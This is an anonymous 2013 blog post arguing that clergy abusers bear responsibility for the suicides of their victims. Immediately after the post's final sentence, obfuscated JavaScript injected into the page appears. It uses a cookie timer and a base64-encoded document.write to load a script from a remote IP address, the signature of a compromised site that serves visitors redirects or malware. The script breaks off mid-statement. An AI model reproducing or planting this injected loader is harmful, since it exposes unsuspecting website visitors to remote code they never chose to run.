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Indirect Hands

June 9, 2013

by: Anonymous
Who is responsible for the death of a victim of suicide following clergy abuse? Is it the hands of the victim or the actual abuser? You be the judge.
A victim of clergy abuse, let it be ages 10-25 or 30-55, these people in some ways “hate themselves” not for the good people they are but for the filth that was poured upon them as an innocent child- boy or girl. Their lies told them filled their minds with doubt, weakness, fear, rage, unbelonging. They were treated like worthless people, only to find out years later that they were worth something.
It is not the hands of the victim that did away with their precious life that is to blame, but the abusers hands – they are the one who “pulled the trigger”. They – THE ABUSER should be held accountable for a “life”. But in other ways and in certain aspects of the law there are technicalities – errors in the law. The abuser walks free and strong while the victim and their family walks in fear. Uneasy to look at this people? Is this NOT INCORRECT?? I’D SAY YES!!!!
An abuser will hide, as the victim is in more clear view, of course, why would they hide- because they have something to hide. Only a victim can tell if an abuser is an abuser – unless it is witnessed.
In the generation of the 1960’s there are thousands of victims of clergy abuse. But in those days – the church could do no wrong. Clergy abuse is the worst form, as it is dangerous. It reflects God Himself – WHO can question GOD? Who is strong enough to do that great deed? And in turn help the wonderful victims? I don’t think it will be the indirect hands that do it. ..match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

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